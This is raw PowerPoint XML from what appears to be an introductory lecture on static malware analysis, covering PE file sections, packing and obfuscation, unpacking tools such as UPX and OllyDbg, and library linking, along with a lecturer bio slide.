                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Strings,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> icons, menus and others included.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374920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669"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2555777" y="1268760"/>
            <a:ext cx="4316226" cy="5466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60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 Headers and Sections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>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380462820"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="557924" y="1200014"/>
          <a:ext cx="8118532" cy="5469346"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1983939"/>
                <a:gridCol w="6134593"/>
              </a:tblGrid>
              <a:tr h="444261">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>.text</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Contains program code</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0180">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>rdata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Holds</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>read-only</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>data</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> that is globally accessible within the program</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
                        <a:t>.</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261">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>.data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Stores</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>global</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> data accessed throughout the program</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85971">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>idata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Sometimes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> presents and stores the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>import</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> function information; if this section is not present, the import function information is stored in the .</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>rdata</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> section.</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85971">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>edata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Sometimes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> presents and stores the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>export</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> function information; if this section is not present, the export function information is stored in the .</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>rdata</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> section.</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0180">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>pdata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Present only in 64-bit executables and stores </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>exception-handling</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>information.</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261">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>rsrc</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Stores</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>resources</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> needed by the executable</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261">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>reloc</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GB" dirty="0" smtClean="0"/>
                        <a:t>Contains information for </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>relocation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t> of library files</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66227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Packing and Obfuscation Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Malware writer often use packing and obfuscation to make their files more difficult to detect or analyse.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>Obfuscated programs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: malware writer has attempted to hide.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>Packed programs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: a subset of obfuscated programs in which the malicious program is compressed and unable to be analysed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611561" y="5266074"/>
            <a:ext cx="8136904" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
              <a:alpha val="49000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0"/>
              <a:t>Packed and obfuscated code will often include at least the functions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0" err="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0"/>
              <a:t>, which are used to load and gain access to additional functions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2167437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124744"/>
            <a:ext cx="4139952" cy="3104964"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Bio</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="1196752"/>
            <a:ext cx="8784976" cy="5544616"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"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3915054"/>
            <a:ext cx="3923928" cy="2942946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="36237" y="1152281"/>
            <a:ext cx="4967811" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Hometown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: multiple towns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>Degree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Ph.D (2014)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Northumbria Unniversity, Newcatle Upon Tyne, UK.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Major: Computer Networks and Communications.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Thesis title: “An Mobility State Adaptive Routing Protocol for Mobile Ad Hoc Netwoks”. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355976" y="4638035"/>
            <a:ext cx="4752528" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Research Interests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Mobile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Ad Hoc and Sensor Networks, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>QoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Routing, Network Security, Visible Light Communications (VLC), Chaos theory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Institute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Korea – Vietnam Friendship IT College</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3056419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Packing and Obfuscation Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Packing Files</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20551"/>
            <a:ext cx="7481478" cy="4200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3779912" y="2060848"/>
            <a:ext cx="1296144" cy="1859767"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381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752010" y="5157192"/>
            <a:ext cx="1468062" cy="144016"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381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88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Packing and Obfuscation Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Once a program is packed, it must be unpacked  before performing an analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Detecting packer: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>PEiD</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Packing/Unpacking: UPX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Examining header: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>PEview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, Resource Hacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="491173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Unpacking</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0021595"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1196975"/>
          <a:ext cx="8229600" cy="511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Up Arrow 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="4437112"/>
            <a:ext cx="504056" cy="864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24554" y="5548590"/>
            <a:ext cx="1718227" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>OllyDbg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>/IDA Pro</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3563888" y="5548590"/>
            <a:ext cx="2012089" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Plugin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>OllyDumpEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Up Arrow 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4317904" y="4492534"/>
            <a:ext cx="504056" cy="864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Up Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7380312" y="4461003"/>
            <a:ext cx="504056" cy="864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7039613" y="5574729"/>
            <a:ext cx="1185453" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ImportREC</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2901627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Libraries and Functions</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Code libraries can be linked statically, runtime, or dynamically.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Knowing how the library code is linked is critical to our understanding of malware because information that we can find in PE file header depends on how the library code has been linked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Static linking: all code of linked library is copied to the executable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Runtime linking:  link to the corresponding library when the function needed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Dynamic linking:  the host OS searches for the necessary libraries when the program is loaded.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3808644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Libraries and Functions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
